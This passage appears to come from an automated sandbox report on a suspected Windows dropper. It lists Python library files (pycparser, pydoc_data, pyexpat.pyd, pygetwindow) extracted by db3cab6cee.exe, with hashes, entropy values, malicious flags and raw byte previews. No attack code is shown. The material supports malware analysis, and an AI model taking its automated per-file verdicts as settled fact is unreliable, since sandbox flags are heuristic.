                                                                                                                                            Preview:#-----------------------------------------------------------------.# pycparser: _c_ast.cfg.#.# Defines the AST Node classes used in pycparser..#.# Each entry is a Node sub-class name, listing the attributes.# and child nodes of the class:.# <name>* - a child node.# <name>** - a sequence of child nodes.# <name> - an attribute.#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#-----------------------------------------------------------------..# ArrayDecl is a nested declaration of an array with the given type..# dim: the dimension (for example, constant 42).# dim_quals: list of dimension qualifiers, to support C99's allowing 'const'.# and 'static' within the array dimension in function declarations..ArrayDecl: [type*, dim*, dim_quals]..ArrayRef: [name*, subscript*]..# op: =, +=, /= etc..#.Assignment: [op, lvalue*, rvalue*]..Alignas: [alignment*]..BinaryOp: [op, left*, right*]..Break: []..Case: [expr*, stmts**]..Cast: [to_type*, expr*]..# Compo

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\ast_transforms.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5565
                                                                                                                                            Entropy (8bit):5.102534275095198
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Yk21CuXk/B5JcShSb6nEsXb+PBZ4dl+R/D4n+YiAn:Yu5SsjWb42Rrs+9An
                                                                                                                                            MD5:FA33AF77A710A58FD999B0B6ADD8360A
                                                                                                                                            SHA1:9B4FD85643C1A0FA3CFCDB5786D52CBF7B135A3F
                                                                                                                                            SHA-256:A3301A4A0BD4778ABEB95E7F2C65EDC199F19AA0110A1D5092F437075672DBAC
                                                                                                                                            SHA-512:AA0E9BBB23B003AFB1D0549A9D4343D0847BEE7631EBC6E1136FD2313A80619C6820B199FFE9B7F0AC1654DBF331107286E5FE87953A7CA99B57146BBA2D928D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.f;.........................*.....d.d.l.m.Z...d...Z.d...Z.d...Z.d...Z.d.S.)......)...c_astc.....................&.....t...........|.t...........j.......................s.J...t...........|.j.........t...........j.......................s.|.S.t...........j.........g.|.j.........j.......................}.d.}.|.j.........j.........p.g.D.].}.t...........|.t...........j.........t...........j.........f...............r=|.j...............................|.................t...........|.|.j.........................|.j.........d...........}..e|...|.j...............................|...................|.j...............................|...................|.|._.........|.S.).a.... The 'case' statements in a 'switch' come out of parsing with one. child node, so subsequent statements are just tucked to the parent. Compound. Additionally, consecutive (fall-through) case statements. come out messy. This is a peculiarity of the C grammar. The following:.. switch (m

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\c_ast.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):53285
                                                                                                                                            Entropy (8bit):4.6782370901529164
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:qrA6nDKJgEUUvp/8xoTPXFzXiLGXXXqXW3ltmsMRlm1:qrZnmyEU618KOyJ1
                                                                                                                                            MD5:62DB41656725098EE9E0949ECD1E4817
                                                                                                                                            SHA1:8CA4964F0B918777E1C6330F74A8EA28C0CA44C2
                                                                                                                                            SHA-256:34D5D7E18DC7E13D7DADA70AA122BBA8FC319BAC66B5DA66E4B7112AD0034390
                                                                                                                                            SHA-512:16C1E2549A7A3949DDF4C36660BCE32E8BE9C9A1EFB67C4AC766A0A17BAC559F2C382066AA4FC38F7D1CF00E81EE3B47E766AF04296551861551796A6171043B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.f.z.............................d.d.l.Z.d...Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d e...............Z...G.d!..d"e...............Z...G.d#..d$e...............Z...G.d%..d&e...............Z...G.d'..d(e...............Z...G.d)..d*e...............Z...G.d+..d,e...............Z...G.d-..d.e...............Z...G.d/..d0e...............Z...G.d1..d2e...............Z...G.d3..d4e...............Z...G.d5..d6e...............Z...G.d7..d8e...............Z...G.d9..d:e...............Z...G.d;..d<e...............Z...G.d=..d>e...............Z ..G.d?..d@e...............Z!..G.dA..dBe...............Z"..G.dC..dDe...............Z#..G.dE..dFe.......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\c_lexer.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18645
                                                                                                                                            Entropy (8bit):5.6855744281858005
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:2RcV+po/A0LlTmEobiGjgz4O20n0HaIu12AuPlYl7:oEco4m1NqiBQguaL1udYN
                                                                                                                                            MD5:FF4749A27E9603FEA67B868073C4D04D
                                                                                                                                            SHA1:067FF3DE0D264D858DEA3864C407E5AFA96585C2
                                                                                                                                            SHA-256:B8D7CB8FA68057D1FEC005E9A9892E09106FE50256CDCC89C15485F27DEA6B8C
                                                                                                                                            SHA-512:CB71EF0038A1E4B123F68871893DB4FC0C02716A7CA55A91ADD68DA40709180663E3BBBDEC9EC305283E9653E037B9FFC6BE4BA94B36AB1EF8E531AA070FE78E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.f"C........................B.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d.S.)......N.....)...lex)...TOKENc.....................(.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.Z.d.Z.i.Z.e.D.].Z.e.e.e.....................................<.....e.D.]>Z.e.e.e.d.d.................................................e.d.d.................................................z...<....?e.e.z...d.z...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.e.z...d.z...e.z...d.z...Z.d.e.z...Z.e.e.z...e.z...Z.e.e.z...e.z...Z.d.Z.d.Z.d.Z.d.Z d.Z!d.e.z...d.z...e.z...d.z...e z...d z...Z"d!Z#d"e"z...d.z...Z$d#e$z...d#z...Z%d$e%z...Z&d%e%z...Z'd&e%z...Z(d'e%z...Z)d#e$z...d(z...Z*d)e$z...d*z...e$z...d+z...Z+d)e$z...d,z...e!z...d-z...Z,d.e#z...d.z...Z-d/e-z...d0z...Z.d$e.z...Z/d%e.z...Z0d&e.z...Z1d'e.z...Z2d/e-z...d1z...e!z...e-z...d0z...Z3d2Z4d3Z5d4e5z...d.z...e4z...d5z...e4z...d6z...Z6d7Z7d8e.z...d9z...e.z...d:z...e.z...d;z...Z8d<e.z...d<z...e.z...d.z...e8z...d.z...e7z...d=z...Z9d>Z:d?..Z

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\c_parser.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):94153
                                                                                                                                            Entropy (8bit):5.190301129573525
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:72UgsIpSNol3cJeZS13wd2afCcbE43ft9k:72UgsI62Y3laKak
                                                                                                                                            MD5:5B494CD0991BCFD68F5C87A9D57433E2
                                                                                                                                            SHA1:779F985A1D01A9F5BC43108EB5D332D22A5B6FE7
                                                                                                                                            SHA-256:129710E363498D9A204BA4478DE59E539EE77BFAEF042C8301B9C6E65D89399F
                                                                                                                                            SHA-512:F0316DC01E96197899B2AFD2B2FC01BFD972EE304E470E26E85A6ED4CA2C1FA2A15D7C84678CE6740E9A90CA601A8120472C4E7C93D844B51B0392B471A553C2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.f*"........................~.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...e...G.d...d.e.............................Z.d.S.)......)...yacc)...c_ast)...CLexer)...PLYParser..ParseError..parameterized..template)...fix_switch_cases..fix_atomic_specifiersc.....................R.....e.Z.d.Z.d.e.d.d.d.d.d.f.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d ..Z.d!..Z.d"..Z d#..Z!d$..Z"d%..Z#d&..Z$d'..Z%d(..Z&d)..Z'd*..Z(d+..Z)d,..Z*d-..Z+d...Z,d/..Z-d0..Z.d1..Z/d2..Z0d3..Z1d4..Z2d5..Z3d6..Z4d7..Z5d8..Z6d9..Z7d:..Z8d;..Z9d<..Z:d=..Z;d>..Z<d?..Z=d@..Z>dA..Z?dB..Z@dC..ZAdD..ZBdE..ZCdF..ZDdG..ZEdH..ZFdI..ZGdJ..ZHdK..ZIdL..ZJdM..ZKdN..ZLdO..ZMdP..ZNdQ..ZOdR..ZPdS..ZQdT..ZRdU..ZSdV..ZTdW..ZUdX..ZVdY..ZW..eXdZd[d\..............d]................ZY..eXdZd[d\..............d^................ZZ..eXdZd[d\..............d_................Z[..eXdZd[.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\lextab.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6870
                                                                                                                                            Entropy (8bit):5.98367100152576
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:LwGpHBmyPpcw1PfCg7Qb35+w7zNLCAfVPghVI/:UGpH8wFfP7Q7wuzNLuQ
                                                                                                                                            MD5:CD040D8DEB6A1FC171866BB4B643C50F
                                                                                                                                            SHA1:0B2E305FB651DEF81C2E774D332874CA50F6982E
                                                                                                                                            SHA-256:7150AACED670C5C82D09FCC2FF3B78C72FE681A179F555942DA7D25854B310B0
                                                                                                                                            SHA-512:2E3F4EA74B98D443CA98FA4AFA11F2CF55A312AC30638C46F5372F9D1B631EE404E1E7584B8742CCAA94CDEB59B2B8D9DD90373410EB440E94B26293FE1F285F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.fj!........................z.....d.Z...e.d...............Z.d.Z.d.Z.d.d.d.d...Z.d.g.d...f.g.d.g.d...f.g.d.g.d...f.g.d...Z.d.d.d.d...Z.d.d.d.d...Z.i.Z.d.S.).z.3.10)q..AND..ANDEQUAL..ARROW..AUTO..BREAK..CASE..CHAR..CHAR_CONST..COLON..COMMA..CONDOP..CONST..CONTINUE..DEFAULT..DIVEQUAL..DIVIDE..DO..DOUBLE..ELLIPSIS..ELSE..ENUM..EQ..EQUALS..EXTERN..FLOAT..FLOAT_CONST..FOR..GE..GOTO..GT..HEX_FLOAT_CONST..ID..IF..INLINE..INT..INT_CONST_BIN..INT_CONST_CHAR..INT_CONST_DEC..INT_CONST_HEX..INT_CONST_OCT..LAND..LBRACE..LBRACKET..LE..LNOT..LONG..LOR..LPAREN..LSHIFT..LSHIFTEQUAL..LT..MINUS..MINUSEQUAL..MINUSMINUS..MOD..MODEQUAL..NE..NOT..OFFSETOF..OR..OREQUAL..PERIOD..PLUS..PLUSEQUAL..PLUSPLUS..PPHASH..PPPRAGMA..PPPRAGMASTR..RBRACE..RBRACKET..REGISTER..RESTRICT..RETURN..RPAREN..RSHIFT..RSHIFTEQUAL..SEMI..SHORT..SIGNED..SIZEOF..STATIC..STRING_LITERAL..STRUCT..SWITCH..TIMES..TIMESEQUAL..TYPEDEF..TYPEID..U16CHAR_CONST..U16STRING_LITERAL..U32CHAR_CONST..U32STRING_LITERAL..U8CHAR_CONST..U8STRING

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\ply\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):272
                                                                                                                                            Entropy (8bit):5.3050723961530215
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:uzSBdTMYhex+nw95/n23d6p9ArfKHxIaCkk8/PKQXit:uzSBdA0ni/2IpeKuanklC2
                                                                                                                                            MD5:59C60759337266A62C40B2C4A03489A5
                                                                                                                                            SHA1:4248AFA9B85CDB1A18A2E9A8620DE6577F3DDEF6
                                                                                                                                            SHA-256:396E91A705C0EDA465EF34700EABA48A8690507CCE9E37447C2522E2AE8F7DF0
                                                                                                                                            SHA-512:13960E85D916582CE1A5A5FC54984064C827E44D08E73345C9D3BB946B90DF2253B70E6BEFC24D9B02321FA9A2F3046E2C9F3465D93573265F8924D743102F91
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.ff...............................d.Z.d.d.g.Z.d.S.).z.3.9..lex..yaccN)...__version__..__all__........jC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\pycparser\ply\__init__.py..<module>r........s.............................r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\ply\lex.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):44081
                                                                                                                                            Entropy (8bit):5.159950482424611
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:JvNElXbYbT+zzTHFu99hSr+idY8WgxtqE9kcDdq4i1Hwt:HCBurvi681tOcDSw
                                                                                                                                            MD5:5DED287BC6D046781EB1F7EAD84FBEDE
                                                                                                                                            SHA1:654C9F541EE7AB6B4B451B2DE70B1DB985BE4D1D
                                                                                                                                            SHA-256:E7EF9C547E5DCB9281773DF3ABE358930E995CF2C4FC976F4328515BC3E07704
                                                                                                                                            SHA-512:6D01243E2F998A67175BA59610CC707F1E2FB7D40CAF976A14E11BACC0F722AF7F7669FFD63F71E639D23D627D7C7A4A97BE93135189108BC9EE9FFCBE879022
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.f...............................d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...e.j.........e.j.........f.Z.n.#.e.$.r...e.e.f.Z.Y.n.w.x.Y.w...e.j.........d...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d...............Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...G.d...d.e...............Z.d.d.d.d.d...e.e.j.......................d.d.d.d.f.d...Z d.d...Z!d...Z"e"Z#d.S.).z.3.10.....Nz.^[a-zA-Z0-9_]+$c...........................e.Z.d.Z.d...Z.d.S.)...LexErrorc.....................$.....|.f.|._.........|.|._.........d.S...N)...args..text)...self..message..ss.... .eC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\pycparser\ply\lex.py..__init__z.LexError.__init__:...s..........J....................N)...__name__..__module__..__qualname__r......r....r....r....r....9...s#......................................r....r....c...........................e.Z.d.Z.d...Z.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\ply\yacc.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):110056
                                                                                                                                            Entropy (8bit):5.204684365965169
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:tMXQt+RO/E/+l6uYIADe+8xwOQlBOjgtDB7+wdkJbYBoP97:trtB/E/OnEDepuBOUXIJbYBoR
                                                                                                                                            MD5:C8D162020F0CF4727AC0E927FF91BC19
                                                                                                                                            SHA1:0D57718B4587B2E9D09736132396286039DF8F7A
                                                                                                                                            SHA-256:11835F36743268696C3A25298320672D3ADB3599C2D362255C6AE0AC1B912B94
                                                                                                                                            SHA-512:8E03F58732FD75CC89E79F4494040BF5E827BBD7AF9CBF9D0CDD0C8D31C427373F89F82DED47B23709286811A1C4495FFA3F88859E5897F8E39DB32CB40A8289
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.fk...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.j.........d...........d.k.....r.e.Z.n.e.Z.e.j.........Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z.d...Z.d...Z.d.a.d.a d.a!d.Z"d...Z#d...Z$d...Z%d...Z&..G.d...d...............Z'..G.d...d...............Z(..G.d...d...............Z)..e.j*........d...............Z+..G.d...d.e...............Z,..G.d ..d!e...............Z-..G.d"..d#e...............Z.d$..Z/..G.d%..d&e...............Z0..G.d'..d(e...............Z1..G.d)..d*e...............Z2..G.d+..d,e...............Z3d-..Z4d...Z5..G.d/..d0e...............Z6..G.d1..d2e3..............Z7d3..Z8d4..Z9..G.d5..d6e...............Z:d.e.d.e.d.d.d.d.e.d.d.d.d.f.d7..Z;d.S.)8.....Nz.3.10Tz.parser.out..parsetab..LALR.....F.(...c...........................e.Z.d.Z.d...Z.d...Z.e.Z.d...Z.d...Z.e.Z.d.S.)...PlyLoggerc...........................|.|._.........d.S...N)...f)...selfr....s.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\plyparser.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6520
                                                                                                                                            Entropy (8bit):5.347443298376005
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:daWPStKjp84qHVUGOPF/LQo2ZRlyF1H6xewzdhDG2bHCGo:dAs1bF/chHlyFsx7JbiGo
                                                                                                                                            MD5:E84E8498AD76CD0293A9FAE41411B4BF
                                                                                                                                            SHA1:23016C0825F74DA1FC566F673E840976B2BD28E1
                                                                                                                                            SHA-256:61F8C15BF72B60C098779A37F439D34C50179B4178395F5B14A71EB920180E3E
                                                                                                                                            SHA-512:DEC430FE9F07C4B7CCBF79A8F8909910F1E9FC3E8BC0DD9F3618EE69C6AA1F728133268F9789BEE0B7B80896CCC041FBC4D3AB266AC8DD55D3628B5EA0674DB3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.f..........................t.....d.d.l.Z...G.d...d.e...............Z...G.d...d.e...............Z...G.d...d.e...............Z.d...Z.d...Z.d...Z.d.S.)......Nc.....................$.....e.Z.d.Z.d.Z.d.Z.d.d...Z.d...Z.d.S.)...Coordz. Coordinates of a syntactic element. Consists of:. - File name. - Line number. - (optional) column number, for the Lexer. )...file..line..column..__weakref__Nc.....................0.....|.|._.........|.|._.........|.|._.........d.S...N..r....r....r....)...selfr....r....r....s.... .gC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\pycparser\plyparser.py..__init__z.Coord.__init__....s....................................c.....................P.....|.j...........d.|.j.............}.|.j.........r.|.d.|.j.........z...z...}.|.S.).N..:z.:%sr....).r......strs.... r......__str__z.Coord.__str__....s3...............D.I.I.........;..2...u.t.{..2..2.......r....r....)...__name__..__module__..__q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pycparser\yacctab.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):196291
                                                                                                                                            Entropy (8bit):4.891242625693368
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:beHxefunsUycmDBZkKSPCcxNSPSe/f8k4ivrz/ET8XAgdDXuNsEDDOdN2y:7GHyNXb8k4krz/ZA8dN3
                                                                                                                                            MD5:1DE14C33CC7C8CE635C871A98C259A82
                                                                                                                                            SHA1:C8432EEE50E499B429A3F62B9303BE04F047E1B8
                                                                                                                                            SHA-256:2F3077B731F651C443AF8C7C33EF8D015EF406439492D25161086096A429CF60
                                                                                                                                            SHA-512:3C63269F343CCF7E7C66F96C4C7C512F80B30ACBFA24AEC9CF79A4F9F40E723A5C67CD9D16B68D97D385CEA54C85BDBAB290D59EA760D11BE12C94DD66C51CFA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.........-.fJ3.............................d.Z.d.Z.d.Z.i.d.g.d...g.d...f...d.g.d...g.d...f...d.g.d...g.d...f...d.g.d...g.d...f...d.g.d...g.d...f...d.g.d...g.d...f...d.g.d...g.d...f...d.g.d...g.d...f...d.g.d...g.d...f...d.g.d...g.d...f...d g.d!..g.d"..f...d#g.d$..g.d%..f...d&g.d$..g.d'..f...d(g.d$..g.d)..f...d*g.d$..g.d+..f...d,g.d$..g.d-..f...d.g.d$..g.d/..f...i.d0g.d$..g.d1..f...d2g.d$..g.d3..f...d4g.d$..g.d5..f...d6g.d$..g.d7..f...d8g.d$..g.d9..f...d:g.d$..g.d;..f...d<g.d=..g.d>..f...d?g.d@..g.dA..f...dBg.d@..g.dC..f...dDg.d@..g.dE..f...dFg.dG..g.dH..f...dIg.dG..g.dJ..f...dKg.dL..g.dM..f...dNg.dG..g.dO..f...dPg.dG..g.dQ..f...dRg.dG..g.dS..f...dTg.dG..g.dU..f.....i.dVg.dG..g.dW..f...dXg.dY..g.dZ..f...d[g.d!..g.d\..f...d]g.d!..g.d^..f...d_g.d`..g.da..f...dbg.dc..g.dd..f...deg.df..g.dg..f...dhg.df..g.di..f...djg.df..g.dk..f...dlg.df..g.dm..f...dng.do..g.dp..f...dqg.df..g.dr..f...dsg.df..g.dt..f...dug.df..g.dv..f...dwg.df..g.dx..f...dyg.df..g.dz..f...d{g.df..g.d|..f.....i.d}g.d~..g.d...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pydoc_data\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):198
                                                                                                                                            Entropy (8bit):4.660814056954756
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:Rg/a04eWu95/n23d6pbUlIaatqtVnkPtkml:ya0bWg/2IpzaatqtqPWS
                                                                                                                                            MD5:20BB80ADD5A1F91ACF351C83C4123314
                                                                                                                                            SHA1:73921D24A730A0A809D2CE8C83418DAFD4D7331E
                                                                                                                                            SHA-256:842A75EBE69C56F61731EE2C2B27BBEC500F4A29F9F70382E35E23983BF2A5C0
                                                                                                                                            SHA-512:3E2A99DF720F58A74A73C12D8DD1546FCBB667891225F891294F89DFE6EF1F06EDACDF49A7DB4D5FA5A9E42593512815D80E922748D38B5A1C639D05F2D583AC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d................................d.S.).N..r..........YC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\pydoc_data\__init__.py..<module>r........s...................r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pydoc_data\_pydoc.css

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1437
                                                                                                                                            Entropy (8bit):4.724832454402538
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:lw+MFtPMbpPZTG592UcLcqF6WW6S2VnsrzQPt7hZPPGWjSfFn7o1:lw+Mf+p8591s96WW9wKqHMvtq
                                                                                                                                            MD5:1183C4B960CD472060D325ADA9C06D8B
                                                                                                                                            SHA1:80BCF962DB427F6498FF85D2EAF21E86FC2D8D9A
                                                                                                                                            SHA-256:EA8F16DC31FAD44952DD9D6C5249E3D5EB51C67AA10D770C9342D372EB669B83
                                                                                                                                            SHA-512:DA8504BE5773E3067A603C797B8D42638B33680281312DD1CC770C5BC09285ABFDF771517DF0C78C6EED765F9092BA15BB1647BFFE05F0E29127111F294FF537
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:/*.. CSS file for pydoc..... Contents of this file are subject to change without notice.....*/....body {.. background-color: #f0f0f8;..}....table.heading tr {.. background-color: #7799ee;..}.....decor {.. color: #ffffff;..}.....title-decor {.. background-color: #ffc8d8;.. color: #000000;..}.....pkg-content-decor {.. background-color: #aa55cc;..}.....index-decor {.. background-color: #ee77aa;..}.....functions-decor {.. background-color: #eeaa77;..}.....data-decor {.. background-color: #55aa55;..}.....author-decor {.. background-color: #7799ee;..}.....credits-decor {.. background-color: #7799ee;..}.....error-decor {.. background-color: #bb0000;..}.....grey {.. color: #909090;..}.....white {.. color: #ffffff;..}.....repr {.. color: #c040c0;..}....table.heading tr td.title {.. vertical-align: bottom;..}....table.heading tr td.extra {.. vertical-align: bottom;.. text-align: right;..}.....heading-text {.. font-family: helvetica,

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pydoc_data\topics.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):471276
                                                                                                                                            Entropy (8bit):4.726741297177418
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:T1tgqnUr+SLNbhdh+giBFWdFDDeOzkA+gKMydUuAIf9XghzkaVni6lBzdlDyJP3N:ZZUr+SxhKgiTWugKouAIFuzkUni6RIso
                                                                                                                                            MD5:D9AC9AF71987549BE5657E203F7DCC79
                                                                                                                                            SHA1:4C9E40BA0C6FB7B959F380953D47B7116D692E84
                                                                                                                                            SHA-256:0EF43FDF0AE94A49124CE676BDDD30381211FEB89D8E7AE50E4FE0A0866AA1CB
                                                                                                                                            SHA-512:B76866660688DB1BEADC64EBDDEF94AEDE2C9D7C92E7F1F065949F1DD92CD9BA93CBFF0C53F0A878D05C4373865B847BF342F52257B9231ABDE4C8FDF6A424C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........d;...............................i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..i.d"d#..d$d%..d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC....i.dDdE..dFdG..dHdI..dJdK..dLdM..dNdO..dPdQ..dRd=..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd....i.dedf..dgdh..didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d.....d.d.d.d.d.d.d.d.d.d.d.d.....Z.d.S.)...assertau...The "assert" statement.**********************..Assert statements are a convenient way to insert debugging assertions.into a program:.. assert_stmt ::= "assert" expression ["," expression]..The simple form, "assert expression", is equivalent to.. if __debug__:. if not expression: raise AssertionError..The extended form, "assert expression1, expression2", is equivalent to.. if __debug__:. if not expression1: raise AssertionError(expression2)..These equivalences ass

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pyexpat.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):199448
                                                                                                                                            Entropy (8bit):6.377510350928234
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:OA1YT2Ga6xWK+RohrRoi9+IC08K9YSMJiCNi+GVwlijAOBgC4i9IPLhhHx:v1YOyGohNoEC08K9oJ5GWl7Fi
                                                                                                                                            MD5:9C21A5540FC572F75901820CF97245EC
                                                                                                                                            SHA1:09296F032A50DE7B398018F28EE8086DA915AEBD
                                                                                                                                            SHA-256:2FF8CD82E7CC255E219E7734498D2DEA0C65A5AB29DC8581240D40EB81246045
                                                                                                                                            SHA-512:4217268DB87EEC2F0A14B5881EDB3FDB8EFE7EA27D6DCBEE7602CA4997416C1130420F11167DAC7E781553F3611409FA37650B7C2B2D09F19DC190B17B410BA5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5.5.5.Mu..5..I.5..I.5..I.5..I.5..I.5..M.5.5..5..I.5..I.5..I...5..I.5.Rich.5.................PE..d......d.........." ..."............0........................................ .......=....`.............................................P................................/..........`3..T........................... 2..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...@!..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pygetwindow\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
